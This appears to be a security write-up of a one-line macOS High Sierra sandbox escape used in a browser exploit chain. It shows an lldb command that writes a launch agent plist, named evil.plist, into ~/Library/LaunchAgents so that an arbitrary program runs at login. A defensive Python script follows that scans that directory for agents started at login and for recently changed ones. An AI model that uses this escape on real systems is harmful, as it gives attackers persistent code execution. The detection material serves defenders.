I am writing about a dead simple and reliable sandbox escape exploit which has only one line of code. Yeah, I am sure it's an exploit, not just a PoC. It has nothing to do with iOS, so please stop asking me anything about that.

The bug was refactored (and killed) before the beta release of Mojave. The latest vulnerable version is macOS High Sierra 10.13.6 (17G65).

Since it's part of a browser exploit chain, you'll need a renderer exploit to gain shellcode execution first. If you don't have one, disable SIP so you can debug, attach lldb to a running com.apple.WebKit.WebContent.xpc process and use the following command:

po CFPreferencesSetAppValue(@"Label", @"You know what should be put here", [(id)NSHomeDirectory() stringByAppendingPathComponent:@"Library/LaunchAgents/evil.plist"])

This line will generate a new plist under ~/Library/LaunchAgents. With the proper arguments you can launch Calculator or anything you like after logging out and back in.
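From a defender's side, the thing to watch is exactly what the line above produces: a new or modified plist in ~/Library/LaunchAgents, which launchd will honour at the next login whether or not the process that wrote it was sandboxed. The following is an added triage script, not code from the original post; it parses LaunchAgents plists with plistlib, reports which ones would execute at login (RunAtLoad or KeepAlive) and what program they point at, and can also list entries modified after a given cutoff time. The sample plists, labels and program paths embedded in it are constructed placeholders so it runs offline.

```python
"""Triage ~/Library/LaunchAgents for agents that launchd will start at login.

Added example (not from the original post). Constructed in-memory plists
stand in for files on disk so the logic can run anywhere; scan_launch_agents()
applies the same checks to a real directory.
"""
import os
import plistlib
import time
from typing import Dict, List, Optional

# Constructed sample plists; labels and program paths are placeholders.
SAMPLE_PLISTS: Dict[str, bytes] = {
    "com.example.updater.plist": plistlib.dumps({
        "Label": "com.example.updater",
        "ProgramArguments": ["/placeholder/path/to/updater", "--quiet"],
        "RunAtLoad": True,
    }),
    "com.example.keepalive.plist": plistlib.dumps({
        "Label": "com.example.keepalive",
        "Program": "/placeholder/path/to/daemon",
        "KeepAlive": True,
    }),
    "com.example.timer.plist": plistlib.dumps({
        "Label": "com.example.timer",
        "ProgramArguments": ["/placeholder/path/to/tool"],
        "StartInterval": 3600,
    }),
    "broken.plist": b"this is not a plist",
}


def summarize_agent(data: bytes) -> Optional[dict]:
    """Parse one plist and return the fields that matter for triage.

    Returns None for unparseable or non-dictionary plists rather than raising,
    so one malformed file never aborts a scan of the whole directory.
    """
    try:
        plist = plistlib.loads(data)
    except Exception:
        return None
    if not isinstance(plist, dict):
        return None
    args = plist.get("ProgramArguments") or []
    program = plist.get("Program") or (args[0] if args else None)
    return {
        "label": plist.get("Label"),
        "program": program,
        "run_at_load": bool(plist.get("RunAtLoad", False)),
        "keep_alive": bool(plist.get("KeepAlive", False)),
    }


def find_login_agents(plists: Dict[str, bytes]) -> List[str]:
    """Return the names of agents launchd would start at login.

    RunAtLoad and KeepAlive both cause a start when the agent is loaded,
    which for LaunchAgents happens at login.
    """
    hits = []
    for name, data in plists.items():
        info = summarize_agent(data)
        if info and (info["run_at_load"] or info["keep_alive"]):
            hits.append(name)
    return sorted(hits)


def scan_launch_agents(directory: str = os.path.expanduser("~/Library/LaunchAgents"),
                       modified_after: Optional[float] = None) -> Dict[str, Optional[dict]]:
    """Read every .plist in the directory and summarize it.

    modified_after is a UNIX timestamp; when given, only files changed after it
    are returned, which is the usual first question after a suspected escape.
    """
    results: Dict[str, Optional[dict]] = {}
    if not os.path.isdir(directory):
        return results
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        path = os.path.join(directory, name)
        if modified_after is not None and os.path.getmtime(path) <= modified_after:
            continue
        with open(path, "rb") as fh:
            results[name] = summarize_agent(fh.read())
    return results


if __name__ == "__main__":
    print("login agents in sample set:", find_login_agents(SAMPLE_PLISTS))
    # Real-disk check: anything in the user's LaunchAgents changed in the last day.
    for name, info in scan_launch_agents(modified_after=time.time() - 86400).items():
        print(name, info)
```

Run it on a machine where a LaunchAgent was recently dropped and the last loop prints the new file with its label and target program; an entry whose program lives somewhere a browser renderer can write (its sandbox container, for instance) is the one to look at first.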